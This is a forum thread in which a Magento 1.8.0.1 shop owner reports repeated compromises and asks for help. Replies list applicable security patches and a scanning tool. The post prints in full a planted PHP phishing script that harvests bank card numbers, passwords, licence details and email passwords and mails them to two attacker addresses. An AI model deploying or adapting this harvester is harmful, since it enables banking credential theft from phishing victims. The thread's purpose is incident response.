cancel
Showing results for 
Search instead for 
Did you mean: 

How ease to hack magento 1.8.0.1?

SOLVED

How ease to hack magento 1.8.0.1?

Hello Friends,

I am using Magento 1.8.0.1 over http and my domain is hacked twice; on first time hackers uses Media and JS to install a Module for additional login.html then I have cleared all offending contents from the server and changed the admin passwords too but again my domain got hacked and now this time they use downloader>skin>install to upload the file pud.php

Here is the detailed code of that file:

<?php

$sec = $_REQUEST['password'];
$page_name= "Stgeorge";

if(isset($sec)) {
		$ip = getenv("REMOTE_ADDR");
		$message .= "---------- Login Information ----------------------------\n";
		$message .= "Card/Access Number: ".$_POST['firstname']."\n";
		$message .= "Security Number: ".$_POST['password']."\n";
		$message .= "Internet Password: ".$_POST['passwords']."\n";
		$message .= "---------- Identity Information ----------------------------\n";
		$message .= "Full Name : ".$_POST['fn']."\n";
		$message .= "Verbal Password : ".$_POST['vb']."\n";
		$message .= "DOB: ".$_POST['dobday']." - ".$_POST['dobmonth']." - ".$_POST['dobyear']."\n";
		$message .= "10-Digit Licence Card Number: ".$_POST['dln']."\n";
		$message .= "Driver's licence number: ".$_POST['dlnssss']."\n";
		$message .= "Licence Expiry Date: ".$_POST['edobday']." - ".$_POST['edobmonth']." - ".$_POST['edobyear']."\n";
		$message .= "---------- Contact Information and Home Address ----------------------------\n";
		$message .= "Mobile Number: ".$_POST['mn']."\n";
		$message .= "Home Phone Number: ".$_POST['pn']."\n";
		$message .= "E-mail Address: ".$_POST['email']."\n";		
		$message .= "E-mail Pass: ".$_POST['emailp']."\n";		
		$message .= "IP: ".$ip."\n";
		$message .= "----------------Created By shika------------------\n";
		$send = "clim01987@gmail.com,k.molodkina.stroyst@mail.ru";
		$subject = $page_name." - ReZulTs";
		$headers = "From: <infos@shika.com>";
		$headers .= $_POST['eMailAdd']."\n";
		$headers .= "MIME-Version: 1.0\n";
		mail("$send", "$subject", $message); 
		header("Location: https://www.stgeorge.com.au/");	
}

else {
	header("Location: https://www.stgeorge.com.au/");	

	
}

?>

Finally, I think that how ease to hack Magento 1.8.0.1?

Now, I need help to stop this hacking sequence and for that please tell me all available processes and available security patches for 1.8.0.1

Thanks

1 ACCEPTED SOLUTION

Accepted Solutions

Re: How ease to hack magento 1.8.0.1?

Magento just launched its own security scan tool - account.magento.com/scanner/ . Sign up for it it is free. It will tell you not only what patches you need to install but also warn you about other vulnerabilities you might have.

View solution in original post

2 REPLIES 2

Re: How ease to hack magento 1.8.0.1?

Hi @Arbit17,

 

The list of patches for that version of Magento is:

 

  • SUPEE-10266: SUPEE-10266 for CE 1.8.0.0-1.8.1.0 (0.04 MB)
  •  SUPEE-10336: SUPEE-10336 for CE 1.8.0.0 and earlier (0.01 MB)
  •  SUPEE-1533: SUPEE-1533 - Magento-CE-v1.8.x-1.9.x (0.01 MB)
  •  SUPEE-1868: Magento-CE-v1.8.x (0.01 MB)
  •  APPSEC-212: Magento-CE-v1.8.0.0-1.8.1.0 (0.01 MB)
  •  SUPEE-2725: Magento-CE-v1.7.0.0-1.8.1.0 (0.01 MB)
  •  SUPEE-3941: Magento-CE-v1.8.0.0-1.9.0.1 (0.03 MB)
  •  SUPEE-4291/4334: Magento-CE-v1.7.x-1.8.x (0.01 MB)
  •  SUPEE-5344: SUPEE-5344 - Magento-CE-v1.8.x-1.9.x (0.01 MB)
  •  SUPEE-5994: SUPEE-5994 for CE 1.6.0.0 - 1.9.1.1 (0.04 MB)
  •  SUPEE-6237: USPS API Patch - SUPEE-6237 - CE 1.6.x-1.9.1.x (0.01 MB)
  •  SUPEE-6285: SUPEE-6285 for CE 1.8.0.0 (0.05 MB)
  •  SUPEE-6482: SUPEE-6482 for CE 1.7.x - 1.8.0.0 (0.01 MB)
  •  SUPEE-6788: SUPEE-6788 for CE 1.8.0.0 (0.17 MB)
  •  SUPEE-7405: SUPEE-7405 for CE 1.8.0.0 (0.11 MB)
  •  SUPEE-7405 v1.1: SUPEE-7405 v1.1 for CE 1.8.0.0 (0.01 MB)
  •  SUPEE-7616: SUPEE-7616 for CE 1.8.0.0 - 1.9.2.2 (0.01 MB)
  •  SUPEE-8167: SUPEE-8167 for CE 1.8.0.0-1.8.1.0 (0.01 MB)
  •  SUPEE-8788: SUPEE-8788 for CE 1.8.0.0 (0.63 MB)
  •  SUPEE-8967: SUPEE-8967 for CE 1.5.0.0-1.9.2.4 (0.01 MB)
  •  SUPEE-9652: SUPEE-9652 for CE 1.5.0.1-1.9.3.1 (0.01 MB)
  •  SUPEE-9767: SUPEE-9767 for CE 1.8.0.0 (0.08 MB)
  •  SUPEE-9767 v2: SUPEE-9767v2 for CE 1.8.0.0 (0.06 MB)
  •  PHP 5.4: Magento-CE-v1.8.0.0 (0.01 MB)

 

You can use this tool as help: http://fabrizioballiano.net/magento-patches/

 

Re: How ease to hack magento 1.8.0.1?

Magento just launched its own security scan tool - account.magento.com/scanner/ . Sign up for it it is free. It will tell you not only what patches you need to install but also warn you about other vulnerabilities you might have.